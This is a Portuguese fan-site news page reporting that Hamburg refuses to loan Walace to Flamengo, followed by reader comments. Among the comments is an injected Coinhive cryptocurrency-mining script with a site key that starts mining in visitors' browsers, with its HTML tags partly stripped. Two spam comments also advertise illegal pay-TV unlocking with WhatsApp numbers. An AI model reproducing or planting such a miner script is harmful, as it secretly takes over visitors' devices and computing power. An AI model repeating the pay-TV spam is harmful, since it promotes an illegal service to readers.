Hamburgo endurece negociação e diz que não vai ceder Walace ao Flamengo

17/1/2018 18:27

Hamburgo endurece negociação e diz que não vai ceder Walace ao Flamengo

Diretor esportivo do clube alemão revela que jogador ficou "decepcionado", mas descarta empréstimo. Representantes do volante e do Rubro-Negro seguem na Alemanha

Hamburgo endurece negociação e diz que não vai ceder Walace ao Flamengo
Walace na mesa com Jens Todt (camisa branca) na chegada ao Hamburgo: diretor do clube alemão faz jogo duro para liberar volante (Foto: Reprodução/Instagram)

"Não cederemos Walace ao Flamengo". É o que afirma o diretor esportivo do Hamburgo, Jens Todt. A negociação que parecia bem encaminhada travou e certo otimismo de quem acompanhava a negociação parou no endurecimento dos alemães pelo empréstimo de Walace.


Segundo o dirigente do clube alemão, o volante comunicou a vontade de sair na última segunda-feira, mas a saída está fora dos planos neste momento. Todt descartou emprestar o jogador - abrindo hipótese apenas para a venda.

- O jogador está tremendamente decepcionado - disse Todt à imprensa local.


Ainda assim, o empresário de Walace, Rogério Braun, e um emissário rubro-negro vão seguir em Hamburgo. O time alemão busca um substituto para o jogador brasileiro, condicionando voltar a conversar sobre a transferência apenas após a contratação de um meio-campista. Mas o sinal do clube alemão é claro: a negociação será dura.

De acordo com a imprensa alemã, o clube tem negociações avançadas com Dominik Kaiser, do Leipzig. Pessoas envolvidas na negociação tratam como um jogo de paciência. O Flamengo não jogou a toalha. O empresário de Walace busca acerto com o Flamengo até o final de janeiro, quando fecha a janela europeia de transferências.

Até o momento, o Flamengo contratou apenas o colombiano Marlos Moreno. Além de Walace, o clube carioca ainda tenta as contratações de Vagner Love e Pablo, mas esbarra nas dificuldades impostas por Alanyaspor e Bordeaux, respectivos clubes dos brasileiros.

2502 visitas - Fonte: Globo Esporte


VEJA TAMBÉM
- Flamengo mantém sequência invicta no Maracanã desde 2019
- Primeira marca: Leonardo Jardim completa dez partidas pelo Flamengo
- Junior Miranda, ex-Flamengo, lança projeto de alto rendimento para revelar talentos no futebol americano



Instale o app do Flamengo para Android, receba notícias e converse com outros flamenguistas no Fórum!

Mais notícias do Flamengo

Notícias de contratações do Flamengo
Notícias mais lidas

Comentários do Facebook -




esquece esse cara e parte pra outra até então de ums ano pra Ka nos so tamos montando time no decore dos campeonatos ai aja treinado que de geito no time

deixa esses caras pra la po,vai atraz do Zeca

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

aff, desculpe me nação rubro negra,mas e mais um ano de sofrimento,brigando de novo para ir a próxima libertadores, até o Vagner Love ficou difícil, só porque a diretora não quer pagar os clubes pelos jogadores

De graça fica muito dificil!!Cambada de incopetentes!!

deixa esse cara pra lá

O ENGRAÇADO É QUE TUDO DÁ CERTO PARA OS OUTROS TIMES. OS CARAS VÃO LÁ, CONTRATA E APRESENTA SEM MUITA CENA, JÁ NO FLAMENGO TUDO VIRA NOVELA. DEPARTAMENTO DE FUTEBOL FRACO.

esse rodrigo vascaetano eh um bosta mesmo,falo isso desde q ele chegou no mengao,mto fraco,so faz merda nas contratações e agora essa...todos os outros clubes ja estao se reforcando,se preparando pros campeonatos q vem por ae e essa diretoria fdp e fraca ainda nessa,insistindo cm esses caras,vai logo atras d oitros q n sejam tao caro e q rendam mais ao time como profissinal poha

manda tmnc entao rpz,ao inves d volantes vai atras d laterais e zagueiros poha

manda esses caras toma no cu deles rapaz

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

é bom quando aparece um bom jogador aki eles vem seco e os otarios aki vende logo a preço de banana. agora é so tirar como liçao.

Deixar esse cara lá mesmo. Só tem esse cara no mercado?

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

ah então manda eles tomar no c****

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.
publicidade